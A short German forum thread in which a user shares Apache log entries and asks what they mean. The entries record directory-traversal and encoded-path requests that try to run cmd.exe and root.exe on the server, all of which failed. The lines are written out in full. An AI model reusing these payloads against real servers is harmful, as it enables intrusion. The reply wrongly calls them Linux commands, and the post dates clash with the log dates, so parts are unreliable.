# Apache Logfile Analyse



## tomcat (29. Januar 2002)

Moin zusammen.
Hier ein Auszug aus meinem Logfile:80.13.43.150 - - [28/Jan/2004:23:01:36 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
80.13.123.184 - - [29/Jan/2004:02:06:12 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
80.13.123.184 - - [29/Jan/2004:02:06:15 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
80.13.123.184 - - [29/Jan/2004:02:06:18 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
80.13.123.184 - - [29/Jan/2004:02:06:22 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
80.13.123.184 - - [29/Jan/2004:02:06:26 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
80.13.123.184 - - [29/Jan/2004:02:06:29 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
80.13.123.184 - - [29/Jan/2004:02:06:32 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
80.13.123.184 - - [29/Jan/2004:02:06:36 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
80.13.123.184 - - [29/Jan/2004:02:06:40 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.13.123.184 - - [29/Jan/2004:02:06:44 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.13.123.184 - - [29/Jan/2004:02:06:48 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.13.123.184 - - [29/Jan/2004:02:06:52 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.13.123.184 - - [29/Jan/2004:02:06:56 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
80.13.123.184 - - [29/Jan/2004:02:07:00 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
80.13.123.184 - - [29/Jan/2004:02:07:04 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
80.13.123.184 - - [29/Jan/2004:02:07:07 +0100] "GET 

Weiß jemand was da los war ?

Hab keine Ahnung, Nimda oder CodeRed oder sonst was ??!!!

Danke für Eure Hilfe.

Tomcat


----------



## dPo2000 (5. Februar 2002)

jemand wollte wohl über deinen Apache Linuxbefehle (aus dem Browser heraus) ausführen... aber wie du selbst siehst hat er nur 404 Errors bekommen (was gut für dich ist, da die Seite nicht zur Verfügung stand => kennst du vielleicht selbst aus deiner Surferfahrung)...


um mehr über Logs zu erfahren empfehle ich die Zeitschrift "Internetworld"...

hoffe es hat dir geholfen !

MfG
dPo


----------

